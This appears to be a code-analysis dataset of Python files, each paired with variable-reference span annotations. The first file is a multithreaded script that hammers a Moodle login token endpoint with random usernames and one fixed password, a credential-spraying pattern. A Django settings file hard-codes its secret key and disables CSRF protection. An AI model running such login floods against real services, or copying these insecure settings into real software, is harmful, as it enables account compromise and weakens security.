usernames = json.loads(open("usernames.json", "r").read())
password = '%4B%65%6E%79%6F%6E%35%25' # A hex encoded password
siteurl = '192.168.122.61'
def run():
username = random.choice(usernames)
token = requests.get('http://' + siteurl + '/login/token.php?username=' + username + '&password=' + password + '&service=moodle_mobile_app').json()["token"]
print(f'{token}')
while True:
#run()
#"""
numthreads = 200
threads = []
for i in range(numthreads):
t = threading.Thread(target = run)
t.daemon = True
threads.append(t)
for i in range(numthreads):
threads[i].start()
for i in range(numthreads):
threads[i].join()
#""" | [
[
[
7,
15
],
[
273,
281
]
],
[
[
23,
32
],
[
559,
568
]
],
[
[
40,
46
],
[
236,
242
]
],
[
[
54,
58
],
[
72,
76
]
],
[
[
60,
69
],
[
250,
259
]
],
[
[
119,
127
],
[
365,
373
]
],
[
[
182,
189
],
[
298,
305
]
],
[
[
214,
217
],
[
585,
588
]
],
[
[
481,
491
],
[
534,
544
],
[
659,
669
],
[
718,
728
]
],
[
[
502,
509
],
[
622,
629
],
[
680,
687
],
[
739,
746
]
],
[
[
523,
524
]
],
[
[
555,
556
],
[
598,
599
],
[
637,
638
]
],
[
[
648,
649
],
[
688,
689
]
],
[
[
707,
708
],
[
747,
748
]
]
] |
import pytest
from autogluon.core.space import Categorical
from autogluon.vision._gluoncv import ObjectDetection
def get_dataset(path):
return ObjectDetection.Dataset.from_voc(path)
@pytest.mark.skip(reason="ObjectDetector is not stable to test, and fails due to transient errors occasionally.")
def test_object_detection_estimator():
dataset = get_dataset('https://autogluon.s3.amazonaws.com/datasets/tiny_motorbike.zip')
train_data, val_data, test_data = dataset.random_split(val_size=0.3, test_size=0.2, random_state=0)
task = ObjectDetection({'num_trials': 1, 'epochs': 1, 'batch_size': 4})
detector = task.fit(train_data)
assert task.fit_summary().get('valid_map', 0) > 0
test_result = detector.predict(test_data)
@pytest.mark.skip(reason="ObjectDetector is not stable to test, and fails due to transient errors occasionally.")
def test_object_detection_estimator_transfer():
dataset = get_dataset('https://autogluon.s3.amazonaws.com/datasets/tiny_motorbike.zip')
train_data, val_data, test_data = dataset.random_split(val_size=0.3, test_size=0.2, random_state=0)
task = ObjectDetection({'num_trials': 1, 'epochs': 1, 'transfer': Categorical('yolo3_darknet53_coco', 'ssd_512_resnet50_v1_voc'), 'estimator': 'ssd', 'batch_size': 4})
detector = task.fit(train_data)
assert task.fit_summary().get('valid_map', 0) > 0
test_result = detector.predict(test_data)
| [
[
[
7,
13
],
[
192,
198
],
[
755,
761
]
],
[
[
48,
59
],
[
1182,
1193
]
],
[
[
98,
113
],
[
150,
165
],
[
551,
566
],
[
1123,
1138
]
],
[
[
120,
131
],
[
358,
369
],
[
930,
941
]
],
[
[
309,
340
]
],
[
[
872,
912
]
]
] |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import asyncio
import pyppeteer
import time
import os
import random
from exe_js import js1, js3, js4, js5
# http://www.mamicode.com/info-detail-2302923.html
# https://segmentfault.com/a/1190000011627343
"""
{
proxy: "127.0.0.1:1234",
proxy-auth: "userx:passx",
proxy-type: "meh"
}
"""
def input_time_random():
return random.randint(300, 500)
async def main():
print("in main ")
print(os.environ.get('PYPPETEER_CHROMIUM_REVISION'))
browser = await pyppeteer.launch(
executablePath=r"D:\A\Desktop\项目+更新\node_project\chrome-win\chrome-win\chrome.exe",
headless=False,
args=[
'--proxy-server=118.24.156.214:8118'
],
timeout=30000)
page = await browser.newPage()
await page.setViewport({"width": 1000, "height": 780})
await page.setUserAgent("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36")
await page.goto('http://httpbin.net/ip')
# await page.waitForNavigation({'waitUntil': 'load'}) # 有时候不需要
content = await page.content()
cookies = await page.cookies()
await page.screenshot({'path': 'example.png'})
dimensions = await page.evaluate('''() => {
return {
width: document.documentElement.clientWidth,
height: document.documentElement.clientHeight,
deviceScaleFactor: window.devicePixelRatio,
}
}''')
print(dimensions)
await browser.close()
return {'content': content, 'cookies': cookies}
asyncio.get_event_loop().run_until_complete(main()) | [
[
[
49,
56
],
[
1593,
1600
]
],
[
[
64,
73
],
[
520,
529
]
],
[
[
81,
85
]
],
[
[
93,
95
],
[
453,
455
]
],
[
[
103,
109
],
[
376,
382
]
],
[
[
129,
132
]
],
[
[
134,
137
]
],
[
[
139,
142
]
],
[
[
144,
147
]
],
[
[
344,
361
]
],
[
[
403,
1590
],
[
1637,
1641
]
]
] |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_yamdb.settings')
application = get_wsgi_application()
| [
[
[
7,
9
],
[
62,
64
]
],
[
[
40,
60
],
[
147,
167
]
],
[
[
133,
144
]
]
] |
"""
Django settings for bingo project.
Generated by 'django-admin startproject' using Django 3.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
MEDIA_ROOT=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@k0#p3kidu)yaaa3u1hplxz)f@^6xiy384*(+n@@s5x#1bx@m5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'quiz',
'teacher',
'student',
'widget_tweaks',
'channels',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CSRF_COOKIE_SECURE=False
ROOT_URLCONF = 'bingo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bingo.wsgi.application'
ASGI_APPLICATION = 'bingo.asgi.application'
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [("localhost", 6379)],
},
},
}
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
STATIC_DIR,
]
LOGIN_REDIRECT_URL='/afterlogin'
#for contact us give your gmail id and password
EMAIL_BACKEND ='django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'xyz.gmail.com'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST_USER = 'from@gmail.com' # this email will be used to send emails
EMAIL_HOST_PASSWORD = 'xyz' # host email password required
# now sign in with your host gmail account in your browser
# open following link and turn it ON
# https://myaccount.google.com/lesssecureapps
# otherwise you will get SMTPAuthenticationError at /contactus
# this process is required because google blocks apps authentication by default
EMAIL_RECEIVING_USER = ['to@gmail.com'] # email on which you will receive messages sent from website
| [
[
[
313,
315
],
[
400,
402
],
[
416,
418
],
[
432,
434
],
[
475,
477
],
[
521,
523
],
[
564,
566
],
[
2690,
2692
]
],
[
[
389,
397
],
[
488,
496
],
[
534,
542
],
[
577,
585
],
[
2703,
2711
]
],
[
[
460,
472
],
[
1856,
1868
]
],
[
[
510,
520
],
[
3583,
3593
]
],
[
[
553,
563
]
],
[
[
800,
810
]
],
[
[
933,
938
]
],
[
[
947,
960
]
],
[
[
994,
1008
]
],
[
[
1281,
1291
]
],
[
[
1695,
1713
]
],
[
[
1720,
1732
]
],
[
[
1749,
1758
]
],
[
[
2247,
2263
]
],
[
[
2291,
2307
]
],
[
[
2336,
2350
]
],
[
[
2595,
2604
]
],
[
[
2840,
2864
]
],
[
[
3343,
3356
]
],
[
[
3368,
3377
]
],
[
[
3387,
3395
]
],
[
[
3404,
3412
]
],
[
[
3421,
3427
]
],
[
[
3539,
3549
]
],
[
[
3564,
3580
]
],
[
[
3599,
3617
]
],
[
[
3681,
3694
]
],
[
[
3742,
3752
]
],
[
[
3771,
3784
]
],
[
[
3792,
3802
]
],
[
[
3809,
3824
]
],
[
[
3885,
3904
]
],
[
[
4229,
4249
]
]
] |
from zenml.steps import BaseStepConfig
class PreTrainingConfigs(BaseStepConfig):
# The configuration for the pre-training of the agent
ENV_NAME: str = "BreakoutDeterministic-v4"
WRITE_TENSORBOARD: bool = True
TENSORBOARD_DIR: str = "tensorboard/"
LEARNING_RATE: float = 0.00001
INPUT_SHAPE: tuple = (84, 84)
BATCH_SIZE: int = 32
SAVE_PATH = "breakout-saves"
USE_PER: bool = False
MEM_SIZE: int = 100
LOAD_FROM: str = None
LOAD_REPLAY_BUFFER: bool = True
MAX_NOOP_STEPS: int = 2000
TOTAL_FRAMES: int = 3000
FRAMES_BETWEEN_EVAL: int = 100000
MAX_EPISODE_LENGTH: int = 18000
EVAL_LENGTH: int = 10000
UPDATE_FREQ: int = 10000
PRIORITY_SCALE: float = 0.7 # How much the replay buffer should sample based on priorities. 0 = complete random samples, 1 = completely aligned with priorities
CLIP_REWARD: bool = True # Any positive reward is +1, and negative reward is -1, 0 is unchanged
UPDATE_FREQ: int = 4 # Number of actions between gradient descent steps
DISCOUNT_FACTOR: float = 0.99 # Gamma, how much to discount future rewards
BATCH_SIZE: int = 32 # Batch size for training
MIN_REPLAY_BUFFER_SIZE = 50000 # The minimum size the replay buffer must be before we start to update the agent
WRITE_TENSORBOARD: bool = True
EVAL_LENGTH: int = 10000 # Number of frames to evaluate for
| [
[
[
24,
38
],
[
69,
83
]
],
[
[
50,
68
]
]
] |
import educative.course1.stacks_queues.stack as s
input_data = [23, 60, 12, 42, 4, 97, 2]
expected_output_data = [2, 4, 12, 23, 42, 60, 97]
# This solution uses a second stack
# 1. until input stack is not empty, we pop the top value and compare it
# with the top value of the second stack
# 2. if value > top of stack 2, we insert the popped value in stack 2
# 3. else while popped value < top of stack 2, we keep pushing top of stack 2 to stack 1
# 4. finally when stack 2 is empty we push the popped value and start over again
# 5. The output will be a sorted stack
# ---------------------------------------------
# NOTE - This can also be done by recursion ---
# ---------------------------------------------
def sort_stack_1(stack):
result = s.Stack(stack.capacity, True) # suppress_printing = True
while not stack.is_empty():
value = stack.pop()
if not result.is_empty() and value >= int(result.peek()):
result.push(value)
else:
while not result.is_empty() and value < int(result.peek()):
stack.push(result.pop())
result.push(value)
return result.prettify()
def main():
input_stack = s.Stack(len(input_data), True) # suppress_printing = True
[input_stack.push(x) for x in input_data]
expected_output_stack = s.Stack(len(expected_output_data), True) # suppress_printing = True
[expected_output_stack.push(x) for x in expected_output_data]
print("Input: \n" + str(input_stack.prettify()))
print("Expected: \n" + str(expected_output_stack.prettify()))
print("Output: \n" + str(sort_stack_1(input_stack)))
if __name__ == '__main__':
main()
| [
[
[
7,
49
],
[
757,
758
],
[
1193,
1194
],
[
1326,
1327
]
],
[
[
51,
61
],
[
1205,
1215
],
[
1285,
1295
]
],
[
[
91,
111
],
[
1338,
1358
],
[
1438,
1458
]
],
[
[
723,
735
],
[
1609,
1621
]
],
[
[
1167,
1171
],
[
1670,
1674
]
]
] |
from __future__ import print_function
from __future__ import division
| [
[
[
23,
37
]
],
[
[
62,
70
]
]
] |
# Author: Denys Makogon
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from glanceclient.v2 import client as glanceclient
from keystoneauth1 import loading
from keystoneauth1 import session
from keystoneclient import client as keystoneclient
from novaclient import client as novaclient
from neutronclient.v2_0 import client as neutronclient
class OpenStackClients(object):
__keystone = None
__nova = None
__neutron = None
__glance = None
def __password_session_setup(self, node):
creds = node.runtime_properties['auth_properties']
if 'region_name' in creds:
del creds['region_name']
loader = loading.get_plugin_loader('password')
auth = loader.load_from_options(**creds)
sess = session.Session(auth=auth)
return sess
def keystone(self, node):
if self.__keystone is None:
self.__keystone = keystoneclient.Client(**node.properties)
self.__keystone.authenticate()
return self.__keystone
def nova(self, node):
if self.__nova is None:
version = node.properties['compute_api_version']
use_connection_pool = node.properties['use_connection_pool']
self.__nova = novaclient.Client(
version, session=self.__password_session_setup(node),
connection_pool=use_connection_pool)
return self.__nova
def neutron(self, node):
if self.__neutron is None:
self.__neutron = neutronclient.Client(
session=self.__password_session_setup(node))
return self.__neutron
def glance(self, node):
if self.__glance is None:
self.__glance = glanceclient.Client(
session=self.__password_session_setup(node))
return self.__glance
openstack = OpenStackClients()
| [
[
[
630,
652
],
[
2231,
2243
]
],
[
[
680,
687
],
[
1184,
1191
]
],
[
[
714,
721
],
[
1286,
1293
]
],
[
[
749,
773
],
[
1430,
1444
]
],
[
[
798,
818
],
[
1764,
1774
]
],
[
[
850,
873
],
[
2027,
2040
]
],
[
[
882,
898
],
[
2356,
2372
]
],
[
[
2344,
2353
]
]
] |
from abc import abstractmethod
from .apr_fetcher import APRFetcher
from typing import Dict, List, Union, Any
from .dapp_apr_fetcher import DappAPRFetcher
from .utils.utils import (
calculate_lp_token_price,
get_block_average_time,
get_token_price_from_dexs,
open_contract,
usdt_address,
platform_name_mapping,
decimals_mapping,
symbol_mapping
)
class MasterchefAPRFetcher(DappAPRFetcher):
"""
Interface for data-fetching based APR fetcher
"""
@abstractmethod
def masterchef_address(self):
raise NotImplementedError()
@abstractmethod
def dapp_token_address_field(self):
raise NotImplementedError()
@abstractmethod
def dapp_token_per_block_or_per_second_field(self, per_block: bool) -> str:
raise NotImplementedError()
@abstractmethod
def _total_staked(self, pool_info):
raise NotImplementedError()
@abstractmethod
def _pool_address(self, pool_info):
raise NotImplementedError()
@abstractmethod
def _alloc_point(self, pool_info):
raise NotImplementedError()
def dapp_token_address(self, web3) -> str:
masterchef_contract = open_contract(self._web3, self._blockchain, self.masterchef_address())
return getattr(masterchef_contract.functions, self.dapp_token_address_field())().call()
def dapp_pools_infos(self, web3) -> List[Dict[str, Union[str, float]]]:
masterchef_contract = open_contract(self._web3, self._blockchain, self.masterchef_address())
d = []
for i in range(masterchef_contract.functions.poolLength().call()):
pool_info = masterchef_contract.functions.poolInfo(i).call()
d.append({
"total_staked": self._total_staked(i, pool_info),
"pool_address": self._pool_address(i, pool_info),
"alloc_point": self._alloc_point(i, pool_info),
})
return d
def dapp_token_per_year(self, web3) -> float:
field_per_second = self.dapp_token_per_block_or_per_second_field(per_block=False)
masterchef_contract = open_contract(self._web3, self._blockchain, self.masterchef_address())
token_contract = open_contract(web3, self._blockchain, self.dapp_token_address(web3))
decimals = token_contract.functions.decimals().call()
if field_per_second is None or field_per_second == "":
average_time_per_block_seconds = get_block_average_time(web3, span=100)
block_per_seconds = 1.0 / average_time_per_block_seconds
block_per_year = block_per_seconds * 3600 * 24 * 365
token_per_block = getattr(masterchef_contract.functions, self.dapp_token_per_block_field(per_block=True))().call()
annual_token_emission = block_per_year * (token_per_block/(10**decimals))
else:
annual_token_emission = getattr(masterchef_contract.functions, field_per_second)().call() * 10**(-decimals) * 3600 * 24 * 365
return annual_token_emission
def dapp_token_total_alloc(self, web3) -> int:
total_alloc = sum([p["alloc_point"] for p in self.dapp_pools_infos(web3)])
return total_alloc
def dapp_token_price(self, web3) -> float:
return get_token_price_from_dexs(web3, self._blockchain, self.dapp_token_address(web3))
| [
[
[
16,
30
],
[
499,
513
],
[
590,
604
],
[
687,
701
],
[
824,
838
],
[
921,
935
],
[
1018,
1032
]
],
[
[
56,
66
]
],
[
[
86,
90
],
[
1399,
1403
]
],
[
[
92,
96
],
[
1394,
1398
]
],
[
[
98,
103
],
[
1409,
1414
]
],
[
[
105,
108
]
],
[
[
139,
153
],
[
406,
420
]
],
[
[
185,
209
]
],
[
[
215,
237
],
[
2451,
2473
]
],
[
[
243,
268
],
[
3251,
3276
]
],
[
[
274,
287
],
[
1186,
1199
],
[
1460,
1473
],
[
2116,
2129
],
[
2212,
2225
]
],
[
[
293,
305
]
],
[
[
311,
332
]
],
[
[
338,
354
]
],
[
[
360,
374
]
],
[
[
385,
405
]
]
] |
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
QUIZZES_URL = reverse('questionary:quiz-list')
class PublicQuizzesApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login required for retrieving quizzes"""
res = self.client.get(QUIZZES_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED) | [
[
[
24,
32
],
[
220,
228
]
],
[
[
57,
64
],
[
157,
164
]
],
[
[
93,
99
],
[
518,
524
]
],
[
[
132,
141
],
[
322,
331
]
],
[
[
143,
154
],
[
462,
473
]
],
[
[
198,
219
]
]
] |
###############################################################################
# Author: CallMeCCLemon
# Date: 2019
# Copyright: 2019 Thomas Littlejohn (@CallMeCCLemon) - Modified BSD License
###############################################################################
from enum import Enum
from PythonApp.pillar.MessageClient import MessageClient
from PythonApp.pillar.PillarMessageTransformer import PillarMessageTransformer
from PythonApp.qc_serial.SerialDao import SerialDao
from PythonApp.qc_serial.SerialUtil import SerialUtil
from PythonApp.qc_serial.model.HeaderMessage import HeaderMessage
from PythonApp.qc_serial.model.OpCode import OpCode
from PythonApp.qc_serial.model.PayloadMessage import PayloadMessage
from PythonApp.util.Config import Config
class States(Enum):
DISCONNECTED = 0
CONNECTED = 1
class SerialStateMachine:
def __init__(self, serial_dao: SerialDao):
self.active_state = States.DISCONNECTED
self.config = Config()
self.states = {
States.DISCONNECTED: self.disconnected,
States.CONNECTED: self.connected,
}
self.serial_dao = serial_dao
self.message_client = MessageClient()
self.header_message_length = 11
self.done = False
def run(self):
while not self.done:
self.states[self.active_state]()
def disconnected(self):
# Send HELO Messages waiting for an ACK.You
hello_message = HeaderMessage(
OpCode.HELO,
0,
int(self.config.get_master_config_value("PillarID")),
0)
self.serial_dao.write(hello_message.to_serial_payload())
message = self.serial_dao.read(self.header_message_length)
try:
SerialUtil.validate_message_header(message)
except TimeoutError as ex:
return
except ValueError as ex:
print(ex)
return
header_message = HeaderMessage.build_header_object(message[1:])
if header_message.opcode == OpCode.ACK:
print("Received ACK! Now connected to badge {}!".format(header_message.from_id))
self.active_state = States.CONNECTED
else:
print("Received unknown message! Skipping..")
def connected(self):
# Send DUMPQ messages waiting for a DUMPA.
dump_q_message = HeaderMessage(
OpCode.DUMPQ,
1,
int(self.config.get_master_config_value("PillarID")),
0)
dump_q_payload = PayloadMessage(int(self.config.get_master_config_value("PillarType")))
print("Sending dump Q message!")
print("Dump Q Header: {}".format(dump_q_message.to_serial_payload(dump_q_payload)))
self.serial_dao.write(dump_q_message.to_serial_payload(dump_q_payload))
print("Dump q payload: {}".format(dump_q_payload.to_serial_payload()))
self.serial_dao.write_no_sync(dump_q_payload.to_serial_payload())
message = self.serial_dao.read(self.header_message_length)
try:
SerialUtil.validate_message_header(message)
header_message = HeaderMessage.build_header_object(message[1:])
if header_message.opcode == OpCode.DUMPA:
print("Received DUMPA! Sending update to cloud!")
message = self.serial_dao.read(header_message.payload_len)
payload_message = PayloadMessage.build_payload_object(message)
pillar_message = PillarMessageTransformer\
.transform_serial_message_to_pillar_message(header_message, payload_message)
self.message_client.send_message_to_queue(pillar_message)
self.done = True
else:
print("Unexpected message type!")
except TimeoutError as ex:
print(ex)
except ValueError as ex:
print(ex)
self.active_state = States.DISCONNECTED
| [
[
[
305,
309
],
[
807,
811
]
],
[
[
356,
369
],
[
1220,
1233
]
],
[
[
425,
449
],
[
3582,
3606
]
],
[
[
493,
502
],
[
922,
931
]
],
[
[
547,
557
],
[
1818,
1828
],
[
3149,
3159
]
],
[
[
611,
624
],
[
1513,
1526
],
[
2023,
2036
],
[
2443,
2456
],
[
3223,
3236
]
],
[
[
671,
677
],
[
1541,
1547
],
[
2107,
2113
],
[
2471,
2477
],
[
3311,
3317
]
],
[
[
732,
746
],
[
2610,
2624
],
[
3503,
3517
]
],
[
[
782,
788
],
[
1006,
1012
]
],
[
[
800,
806
],
[
963,
969
],
[
1053,
1059
],
[
1106,
1112
],
[
2246,
2252
],
[
4032,
4038
]
],
[
[
866,
884
]
]
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.